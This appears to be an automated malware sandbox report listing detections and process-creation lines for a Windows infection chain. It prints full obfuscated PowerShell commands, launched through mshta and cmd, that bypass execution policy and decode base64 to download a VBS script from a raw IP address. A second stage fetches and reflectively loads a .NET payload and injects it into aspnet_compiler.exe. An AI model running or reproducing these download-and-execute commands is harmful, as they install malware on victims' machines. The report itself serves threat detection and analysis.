Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
